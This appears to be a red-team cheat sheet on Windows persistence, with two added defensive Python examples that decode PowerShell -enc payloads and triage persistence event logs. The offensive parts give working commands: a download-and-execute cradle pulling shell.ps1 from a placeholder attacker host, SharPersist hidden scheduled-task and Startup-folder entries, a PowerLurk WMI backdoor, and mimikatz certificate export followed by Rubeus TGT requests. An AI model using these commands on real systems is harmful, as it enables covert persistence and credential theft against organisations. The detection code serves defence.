Windows

Encoding commands

The commands you want to run usually contain special characters (quotes, parentheses, pipes), so the safest way to pass them to PowerShell is Base64-encoded UTF-16LE, which is what -enc / -EncodedCommand expects. That avoids quoting and escaping errors at execution time.

  • Windows

$str = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

  • Linux

str='IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
echo -n "$str" | iconv -t UTF-16LE | base64 -w 0
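Added example (not from the original page): a Python equivalent of the two one-liners above, plus the reverse operation a defender needs, turning an -enc argument found in a process-creation log or a scheduled-task definition back into readable PowerShell. SAMPLE_COMMAND is a constructed, benign stand-in for the command string; the function names are this example's own.

```python
import base64
import re

# Constructed, benign stand-in for the command string the page encodes.
SAMPLE_COMMAND = 'Write-Output ("host: " + $env:COMPUTERNAME)'


def encode_powershell_command(command: str) -> str:
    """Produce what the page's one-liners produce: UTF-16LE bytes, Base64-encoded.
    powershell.exe -EncodedCommand (-enc) expects exactly this encoding."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> str:
    """Reverse the encoding so an -enc payload seen in a log can be read."""
    padded = blob + "=" * (-len(blob) % 4)  # some log pipelines strip '=' padding
    return base64.b64decode(padded).decode("utf-16-le")


# A switch name followed by a run of Base64 characters. powershell.exe accepts any
# unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), so the switch name is
# checked as a prefix of "encodedcommand" rather than matched literally.
_SWITCH_AND_BLOB = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")


def extract_encoded_commands(command_line: str) -> list:
    """Return the decoded text of every -enc style argument in a command line."""
    decoded = []
    for name, blob in _SWITCH_AND_BLOB.findall(command_line):
        if not "encodedcommand".startswith(name.lower()):
            continue  # -nop, -w, -c ... are not the encoded-command switch
        try:
            decoded.append(decode_powershell_command(blob))
        except ValueError:  # not valid Base64 or not UTF-16LE: skip it
            continue
    return decoded


if __name__ == "__main__":
    blob = encode_powershell_command(SAMPLE_COMMAND)
    print(blob)
    print(extract_encoded_commands(f"powershell.exe -nop -w hidden -enc {blob}"))
```

The decoder is the piece to keep at hand: a scheduled task or WMI consumer whose arguments contain -enc tells you nothing until the blob is decoded, and the decode is deterministic, so it belongs in log enrichment rather than manual triage.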

Task Scheduler

A task that will be executed hourly.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

StartUp Folder

This command will be executed once the user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

WMI

Create a permanent WMI event subscription whose command runs whenever a matching process starts; in this case the trigger is the start of notepad.exe.

Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
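The three mechanisms above (scheduled task, Startup folder, permanent WMI subscription) each leave an artifact that Windows logs. Added example, not part of the original page or of any tool it names: a Python triage function over constructed, normalised event records (Security 4698 task creation, Sysmon 11 file creation, WMI-Activity 5861 permanent subscription) using the page's own task name, Startup-folder file name and WMI consumer command. The record field names are assumptions of this example, not the real event XML, and the -enc value is the page's own placeholder.

```python
import re

# Constructed, normalised sample events (assumed field names, not raw Windows XML):
# two Security 4698 "scheduled task created" records (one hostile, one benign),
# a Sysmon 11 file-create in the per-user Startup folder, and a WMI-Activity 5861
# permanent subscription with a CommandLineEventConsumer.
SAMPLE_EVENTS = [
    {"event_id": 4698, "task_name": "\\Updater",
     "command": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "arguments": "-nop -w hidden -enc <ENCODED_PAYLOAD>", "trigger": "hourly"},
    {"event_id": 4698, "task_name": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "command": r"%windir%\system32\defrag.exe", "arguments": "-c -h -o -$", "trigger": "weekly"},
    {"event_id": 11,
     "target_filename": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserEnvSetup.lnk"},
    {"event_id": 5861, "consumer_type": "CommandLineEventConsumer",
     "command": r"C:\Windows\dns_x64.exe",
     "query": "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA "
              "'Win32_Process' AND TargetInstance.Name = 'notepad.exe'"},
]

# Interpreters that a persistence task rarely has a legitimate reason to launch hidden.
SCRIPT_HOSTS = re.compile(
    r"(?:^|\\)(?:powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$", re.I)
# Hidden window, no profile, non-interactive or encoded command: the page's exact flags.
SUSPICIOUS_ARGS = re.compile(
    r"-(?:e|ec|enc|encodedcommand)\b|-w(?:indowstyle)?\s+hidden|-nop\b|-noni\b", re.I)
STARTUP_FOLDER = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
# Consumers that execute something; the logging consumers are far more common legitimately.
ACTIVE_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}


def triage(events):
    """Return (event_id, artifact, reason) for each record that matches a persistence pattern."""
    findings = []
    for ev in events:
        eid = ev["event_id"]
        if eid == 4698:
            if SCRIPT_HOSTS.search(ev["command"]) and SUSPICIOUS_ARGS.search(ev["arguments"]):
                findings.append((eid, ev["task_name"],
                                 "script host with hidden/encoded arguments, trigger=" + ev["trigger"]))
        elif eid == 11:
            if STARTUP_FOLDER.search(ev["target_filename"]):
                findings.append((eid, ev["target_filename"], "file dropped into Startup folder"))
        elif eid == 5861:
            if ev["consumer_type"] in ACTIVE_CONSUMERS:
                findings.append((eid, ev["command"],
                                 "permanent WMI subscription, " + ev["consumer_type"] + ": " + ev["query"]))
    return findings


if __name__ == "__main__":
    for eid, artifact, reason in triage(SAMPLE_EVENTS):
        print(f"[{eid}] {artifact}: {reason}")
```

4698 is only written when "Audit Other Object Access Events" is enabled, and 5861 only when the WMI-Activity/Operational channel is on; without those, Sysmon events 19/20/21 (WMI filter, consumer, binding) and a periodic enumeration of root\subscription are the fallback.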

Certificates

Certificates are a valuable tool for maintaining persistent access to both user and computer accounts, as they typically have a longer lifespan than passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not depend on any misconfigured (vulnerable) certificate templates, which makes it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to keep accessing the target system(s) over an extended period of time.

User

1. Enumerate the certificates on the machine

.\Seatbelt.exe Certificates

2. Export the certificates with mimikatz. The exported .pfx files are protected with the password "mimikatz".

.\mimikatz.exe "crypto::certificates /export" "exit"

3. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

4. Use Rubeus to obtain a TGT.

.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>

Computer

You must be a local administrator.

1. Extract the machine certificates.

.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

2. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

3. Request a TGT

.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT>
